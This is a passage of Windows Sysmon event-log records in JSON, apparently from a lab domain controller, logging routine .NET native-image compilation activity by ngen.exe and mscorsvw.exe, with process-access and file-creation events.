90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001040AD1100}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001040AD1100}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.544\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-001098731300}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.544","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-001098731300}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:02.622\r\nProcessGuid: {A837DB8D-051E-5F25-0000-001098731300}\r\nProcessId: 1820\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\71c-0\\CustomMarshalers.dll\r\nCreationUtcTime: 2020-08-01 06:01:02.622","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:02.622","ProcessGuid":"{A837DB8D-051E-5F25-0000-001098731300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\71c-0\\CustomMarshalers.dll","CreationUtcTime":"2020-08-01 06:01:02.622","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.653\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010D1761300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.653","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010D1761300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.653\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010D1761300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.653","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010D1761300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010D1761300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010D1761300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.840\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010907A1300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.840","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010907A1300}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.840\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010907A1300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.840","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010907A1300}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.840\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-0010907A1300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 